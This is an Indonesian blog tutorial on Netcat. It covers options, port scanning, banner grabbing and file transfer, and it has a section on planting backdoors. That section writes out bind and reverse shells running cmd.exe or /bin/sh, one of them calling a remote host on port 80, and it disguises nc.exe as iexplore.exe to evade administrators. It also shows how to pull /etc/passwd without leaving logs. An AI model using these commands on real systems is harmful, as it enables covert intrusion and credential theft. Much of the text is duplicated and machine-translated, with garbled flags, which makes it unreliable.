Program TKJ
Netcat
adalah sebuah utiliti yang digunakan untuk berbagai hal yang berkaitan dengan
protokol TCP atau UDP. Yang dapat membuka koneksi TCP, mengirimkan paketpaket
UDP, listen pada port port TCP dan UDP, melakukan scanning port, dan sesuai dengan IPV4 dan IPV6.
Tools ini sering disebut sebagai "TCP/IP Swiss Army Knife"-nya para hacker. Versi originalnya ditulis untuk sistem operasi Unix oleh Hobbit (hobbit@avian.org) pada tahun 1995. Versi Windows NT dikerjakan oleh Weld Pond (weld@l0pth.com).
Port Scanning
Seperti juga pisau Swiss Army yang memiliki banyak mata pisau beraneka fungsi, maka Netcat
juga memiliki aneka fungsi yang dimiliki tools lainnya, salah satunya adalah “mata pisau” port
scanning
Walaupun tidak selengkap dan secanggih tools Nmap atau Supercan, Netcat dapat digunakan
untuk melihat port mana saja yang terbuka.
-D Menempatkan netcat dalam mode siluman. Oleh karena itu berjalan di latar belakang. Perintah ini hanya tersedia pada windows.
-E <command> Jika dikompilasi menjadi pilihan GAPING_SECURITY_HOLE, sebuah netcat mendengarkan akan mengeksekusi <command> setiap saat seseorang membuat koneksi pada port yang itu mendengarkan
-I <seconds> ini adalah interval penundaan. Ini adalah jumlah waktu netcat menunggu antara data mengirimkan.
-G <route-list> Netcat mendukung routing longgar.
-G <hop-pointer> Pilihan ini memungkinkan Anda untuk mengontrol ip di rute-list Anda hop berikutnya.
-L ini adalah mendengarkan mode.
-L ini adalah mode mendengarkan kuat hanya availiable di windows. Ini memberitahu Netcat untuk memulai kembali modus Dengar nya dengan opsi baris perintah yang sama setelah sambungan ditutup
-N Menceritakan netcat untuk tidak melakukan pencarian nama host.
-O <hexfile> Apakah hex dump pada data dan menyimpannya dalam hexfile.
-P <port> Menentukan pelabuhan
-R Netcatchooses port lokal dan remote acak.
SSpecifies-ip alamat sumber netcat harus digunakan saat membuat koneksi nya.
-T Jika dikompilasi dengan opsi telnet netcat akan dapat menangani negosiasi dengan server telnet telnet.
-U Menceritakan netcat menggunakan UDP, bukan TCP.
-V verbose. Mengontrol berapa banyak netcat akan memberitahu Anda apa its lakukan.
-W <seconds> Kontrol berapa lama netcat akan menunggu sebelum membatalkan koneksi.
-Z Menceritakan netcat untuk hanya mengirim data yang cukup untuk menemukan port mana yang mendengarkan dalam kisaran tertentu Anda.
mengingatkan Anda, jangan pernah mencoba kemampuan netcat di sistem komputer yang
bukan milik anda sendiri !
protokol TCP atau UDP. Yang dapat membuka koneksi TCP, mengirimkan paketpaket
UDP, listen pada port port TCP dan UDP, melakukan scanning port, dan sesuai dengan IPV4 dan IPV6.
Tools ini sering disebut sebagai "TCP/IP Swiss Army Knife"-nya para hacker. Versi originalnya ditulis untuk sistem operasi Unix oleh Hobbit (hobbit@avian.org) pada tahun 1995. Versi Windows NT dikerjakan oleh Weld Pond (weld@l0pth.com).
FiturnyaFitur
dari Netcat antara lain adalah:
* Dapat mebangun koneksi Outbound dan inbound dengan TCP atau UDP, di dan dari port mana saja.
* Dapat membaca argumen pada command line dari standar input
* Full DNS forwarding/reverse checking
* Kemampuan untuk menggunakan any local source port
* Kemampuan menggunakan any locally-configured network source address
* Tersedia port scanning secara built-in
* Dan lain-lain
Dengan fitur² diatas banyak pengelola system memanfaatkannya untuk melakukan hal-hal kurang lebihnya seperti berikut ini :
* Scanning port dan menginventori service-service yang terpasang pada server
* File transfer
* Pengujian dan simulasi terhadap server
* Pengujian terhadap firewall, proxy dan gateway
* Pengujian performance network
* Pengujian address spoofing
* Banner grabbing
* Dapat mebangun koneksi Outbound dan inbound dengan TCP atau UDP, di dan dari port mana saja.
* Dapat membaca argumen pada command line dari standar input
* Full DNS forwarding/reverse checking
* Kemampuan untuk menggunakan any local source port
* Kemampuan menggunakan any locally-configured network source address
* Tersedia port scanning secara built-in
* Dan lain-lain
Dengan fitur² diatas banyak pengelola system memanfaatkannya untuk melakukan hal-hal kurang lebihnya seperti berikut ini :
* Scanning port dan menginventori service-service yang terpasang pada server
* File transfer
* Pengujian dan simulasi terhadap server
* Pengujian terhadap firewall, proxy dan gateway
* Pengujian performance network
* Pengujian address spoofing
* Banner grabbing
Instalasi Netcat
Saat ini Netcat telah tersedia tidak saja pada sistem operasi Unix dan Linux, melainkan juga
pada sistem operasi Windows.
Pada tulisan ini kami menggunakan Netcat dengan sistem operasi Windows. Semua perintah
pada command line sama dengan perintah yang terdapat pada Netcat dengan sistem operasi
Unix.Instalasi Netcat pada sistem operasi Windows sangat sederhana. Pertama Anda dapat
mendownload dari situs http://www.atstake.com/research/tools/network_utilities/ atau di
banyak situs hacker lainnya. Namun demikian Anda harus waspada jika mendownload dari situs
yang tidak Anda kenal betul, bisa jadi tools Netcat-nya sudah dimodifikasi menjadi trojan horse
yang dapat mengganggu sistem Anda.
Kemudian Anda cukup melakukan unzip terhadap file yang telah Anda download,
File utama yang perlu Anda perhatikan hanyalah nc.exe saja, file lainnya perlu Anda perhatikan
bila Anda perlu melakukan kompilasi ulang.
Saat ini Netcat telah tersedia tidak saja pada sistem operasi Unix dan Linux, melainkan juga
pada sistem operasi Windows.
Pada tulisan ini kami menggunakan Netcat dengan sistem operasi Windows. Semua perintah
pada command line sama dengan perintah yang terdapat pada Netcat dengan sistem operasi
Unix.Instalasi Netcat pada sistem operasi Windows sangat sederhana. Pertama Anda dapat
mendownload dari situs http://www.atstake.com/research/tools/network_utilities/ atau di
banyak situs hacker lainnya. Namun demikian Anda harus waspada jika mendownload dari situs
yang tidak Anda kenal betul, bisa jadi tools Netcat-nya sudah dimodifikasi menjadi trojan horse
yang dapat mengganggu sistem Anda.
Kemudian Anda cukup melakukan unzip terhadap file yang telah Anda download,
File utama yang perlu Anda perhatikan hanyalah nc.exe saja, file lainnya perlu Anda perhatikan
bila Anda perlu melakukan kompilasi ulang.
Memulai Netcat
Sebelum memulai, sebaiknya Anda perlu mengetahui fasilitas apa saja yang tersedia pada
Netcat. Untuk itu Anda dapat memulai dengan melihat option yang tersedia. Untuk mengetahui
option yang tersedia pada Netcat, cukup memanggil help-nya pada Dos prompt.
Sebelum memulai, sebaiknya Anda perlu mengetahui fasilitas apa saja yang tersedia pada
Netcat. Untuk itu Anda dapat memulai dengan melihat option yang tersedia. Untuk mengetahui
option yang tersedia pada Netcat, cukup memanggil help-nya pada Dos prompt.
Port Scanning
Seperti juga pisau Swiss Army yang memiliki banyak mata pisau beraneka fungsi, maka Netcat
juga memiliki aneka fungsi yang dimiliki tools lainnya, salah satunya adalah “mata pisau” port
scanning
Walaupun tidak selengkap dan secanggih tools Nmap atau Supercan, Netcat dapat digunakan
untuk melihat port mana saja yang terbuka.
Banner Grabbing
Salah satu cara mendapatkan informasi mengenai sistem operasi dan aplikasi yang dijalankan
oleh sebuah host adalah dengan melakukan banner grabbing atau membaca informasi yang ada
di dalam banner sebuah sistem.
Salah satu cara mendapatkan informasi mengenai sistem operasi dan aplikasi yang dijalankan
oleh sebuah host adalah dengan melakukan banner grabbing atau membaca informasi yang ada
di dalam banner sebuah sistem.
Baris Perintah
-D Menempatkan netcat dalam mode siluman. Oleh karena itu berjalan di latar belakang. Perintah ini hanya tersedia pada windows.
-E <command> Jika dikompilasi menjadi pilihan GAPING_SECURITY_HOLE, sebuah netcat mendengarkan akan mengeksekusi <command> setiap saat seseorang membuat koneksi pada port yang itu mendengarkan
-I <seconds> ini adalah interval penundaan. Ini adalah jumlah waktu netcat menunggu antara data mengirimkan.
-G <route-list> Netcat mendukung routing longgar.
-G <hop-pointer> Pilihan ini memungkinkan Anda untuk mengontrol ip di rute-list Anda hop berikutnya.
-L ini adalah mendengarkan mode.
-L ini adalah mode mendengarkan kuat hanya availiable di windows. Ini memberitahu Netcat untuk memulai kembali modus Dengar nya dengan opsi baris perintah yang sama setelah sambungan ditutup
-N Menceritakan netcat untuk tidak melakukan pencarian nama host.
-O <hexfile> Apakah hex dump pada data dan menyimpannya dalam hexfile.
-P <port> Menentukan pelabuhan
-R Netcatchooses port lokal dan remote acak.
SSpecifies-ip alamat sumber netcat harus digunakan saat membuat koneksi nya.
-T Jika dikompilasi dengan opsi telnet netcat akan dapat menangani negosiasi dengan server telnet telnet.
-U Menceritakan netcat menggunakan UDP, bukan TCP.
-V verbose. Mengontrol berapa banyak netcat akan memberitahu Anda apa its lakukan.
-W <seconds> Kontrol berapa lama netcat akan menunggu sebelum membatalkan koneksi.
-Z Menceritakan netcat untuk hanya mengirim data yang cukup untuk menemukan port mana yang mendengarkan dalam kisaran tertentu Anda.
Pemakaian
Netcat Backdoor
Korban:
Korban:
nc-L-d-p <port>-t-e cmd.exe
-L adalah
perintah mendengarkan. -D memberitahu netcat untuk tidak membuka jendela ketika
berjalan. -P memberikan port. -T adalah untuk telnet. -E mengaktifkan cmd.exe
ketika klien terhubung secara
Klien:
nc-v <ip alamat victim>
catatan: Dalam
contoh ini netcat berjalan di latar belakang pada mesin korban. Sebuah sistem
admin bisa membuka task manager dan melihat bahwa nc.exe sedang berjalan.
Seorang hacker pintar akan mengubah nc.exe untuk sesuatu seperti iexplorer.exe
atau updatemanager.exe untuk menghindari suspiscion.
Sekarang, jika
seorang sistem administrator menjalankan perintah netstat-a-n terpercaya di DOS
prompt, ia mungkin melihat bahwa ada sesuatu yang berjalan pada port yang agak
aneh, telnet ke port tersebut, dan menemukan trik. Namun, Windows menggunakan
port acak beberapa untuk berbagai alasan dan output netstat dapat memakan waktu
untuk mengurai, terutama pada sistem
dengan banyak aktivitas. Hacker mungkin akan mencoba pendekatan yang berbeda.
dengan banyak aktivitas. Hacker mungkin akan mencoba pendekatan yang berbeda.
Jika mereka telah
menyusup ke server Citrix, misalnya, diakses oleh beberapa pengguna yang
berselancar di Web, Anda akan mengharapkan untuk melihat banyak Domain Name
System ( DNS) lookup dan koneksi Web. Menjalankan netstat-a-n akan
mengungkapkan beban keluar port TCP 80 koneksi. Alih-alih memiliki sebuah
instance dari netcat mendengarkan pada kotak Windows dan menunggu untuk
koneksi,
untuk contoh lain Netcat mendengarkan pada kotak remote pada port 80. Di ujung sana, hacker akan menjalankan: nc-l-p 80 Dari kotak Windows, hacker cerdik bisa “menyembunyikan” Netcat dan mengeluarkan perintah ini:
untuk contoh lain Netcat mendengarkan pada kotak remote pada port 80. Di ujung sana, hacker akan menjalankan: nc-l-p 80 Dari kotak Windows, hacker cerdik bisa “menyembunyikan” Netcat dan mengeluarkan perintah ini:
mkdir C: \ Windows \ System32 \ Drivers \ q
move nc.exe C: \ Windows \ System32 \ Drivers \ q \ iexplore.exe
cd Windows \ System32 \ Drivers \ q
WINDOWS \ System32 \ DRIVER \ q> iexplore.exe
Cmd line:-d-e cmd.exe originix 80
WINDOWS \ System32 \ DRIVER \ q>
move nc.exe C: \ Windows \ System32 \ Drivers \ q \ iexplore.exe
cd Windows \ System32 \ Drivers \ q
WINDOWS \ System32 \ DRIVER \ q> iexplore.exe
Cmd line:-d-e cmd.exe originix 80
WINDOWS \ System32 \ DRIVER \ q>
Sekarang Netcat
mendengarkan harus mengambil perintah shell dari mesin Windows. Hal ini dapat
melakukan pekerjaan yang lebih baik menyembunyikan backdoor dari administrator
sistem. Pada pandangan pertama, koneksi hanya akan terlihat seperti Internet
Explorer membuat koneksi HTTP biasa. Kerugian hanya untuk hacker adalah bahwa
setelah mengakhiri shell, tidak ada cara restart itu di sisi Windows.
port Scanning
Perintah:
Perintah:
nc-z-w2 <IP Address> 1-6000
-Z memberitahu
netcat untuk menjalankan scan port. -W2 memberitahu netcat menunggu selama 2
detik sebelum memutuskan. 1-6000 adalah port untuk memindai. Jika mau, Anda
bisa menambahkan-v atau-vv untuk melihat lebih dari apa yang sedang terjadi
sehingga:
nc-vv-z-w2 <IP Address> 1-6000
Banner grabbing
Banner grabbing
adalah fungsi yang membantu Anda melihat apa yang berjalan di belakang port
tertentu.
Command:
nc <IP Address> 80
Command:
GET HTTP
or
HEAD / HTTP/1.0
GET HTTP
or
HEAD / HTTP/1.0
File Transfer
Dari sistem di mana file disimpan:
Dari sistem di mana file disimpan:
nc-l-u-p 55555 <file_we_want>
Command of
receiving system::
nc-u-targethost 55555> copy_of_file
Ini dapat
digunakan untuk meraih etc / passwd. Hal ini dapat dilakukan dengan
memanfaatkan perintah
nc-l-u-p 55555 </ etc / passwd
Netcat melakukan
transfer file di bawah radar. Ini tidak meninggalkan log lain apapun. FTP
lainnya melakukan log cuti.
Setting a Trap
Anda bisa menjalankan instance dari netcat pada port hacker dapat mengharapkan untuk menemukan kerentanan. Jika baik Anda, Anda mungkin dapat menjebak hacker menggunakan sesuatu seperti perintah:
Anda bisa menjalankan instance dari netcat pada port hacker dapat mengharapkan untuk menemukan kerentanan. Jika baik Anda, Anda mungkin dapat menjebak hacker menggunakan sesuatu seperti perintah:
nc-l-v-e fakemail.pl-p 25 >> traplog.txt
skrip fakemail
mungkin menggemakan beberapa output untuk memberitahu dunia itu berjalan versi
sendmail dan praktis mengemis sebuah kanak-kanak script untuk datang hack.
Setelah dia lakukan Anda bisa membanjiri dia dengan apa yang pernah Anda inginkan.
Jika bagus, Anda bisa menjalankan script untuk ambil IP-nya.
Linux Backdoor
Sebagian besar tutorial ini dibangun di sekitar jendela hacking dengan netcat. Namun, yang sama dapat dilakukan pada sistem Linux dengan perintah:
Sebagian besar tutorial ini dibangun di sekitar jendela hacking dengan netcat. Namun, yang sama dapat dilakukan pada sistem Linux dengan perintah:
nc-u-l-p 55555-e / bin / sh nc
Buat penggunaan
sendiri
Ada beberapa skrip shell dan program C yang menghasilkan cara yang lebih mungkin untuk menggunakan netcat. Dengan sedikit pemahaman tentang pemrograman komputer Anda dapat membuat penggunaan sendiri dari netcat. Saya mendorong Anda untuk mencoba.
Ada beberapa skrip shell dan program C yang menghasilkan cara yang lebih mungkin untuk menggunakan netcat. Dengan sedikit pemahaman tentang pemrograman komputer Anda dapat membuat penggunaan sendiri dari netcat. Saya mendorong Anda untuk mencoba.
Anda mungkin
berpendapat bahwa netcat adalah telnet terbaik Yah itu. Namun memiliki
kemampuan jauh lebih. Netcat adalah alat favorit saya karena kesederhanaannya.
Hal ini mudah dikompilasi ke dalam script atau kode. Anda mungkin berkata “,
kau idiot? Ada beberapa program seperti meterpreter yang dapat digunakan
sebagai backdoors yang jauh lebih mudah “Untuk ini saya mengatakan ya saya
idiot.,
Tapi netcat jauh
lebih dari sekedar backdoor. Anda juga mungkin berkata, “, Anda idiot Bagaimana
Anda mendapatkan salinan nc.exe ke folder system32 tanpa harus akses ke
komputer?.” Sekali lagi saya setuju saya bodoh tapi saya mendorong Anda untuk
belajar program di C atau menulis script di perl dan menemukan cara untuk
mengkompilasi nc.exe ke dalam kode atau script. Ini adalah alat untuk ada di
gudang Anda, bahkan jika Anda adalah penggemar meterpreter. Ada banyak kegunaan
lain dari netcat dari apa yang saya menjelaskan.
Beberapa fitur dan pemanfaatan Netcat akan dijelaskan di bawah.
Namun kami harus selalumengingatkan Anda, jangan pernah mencoba kemampuan netcat di sistem komputer yang
bukan milik anda sendiri !
sumber artikel :
0 komentar:
Post a Comment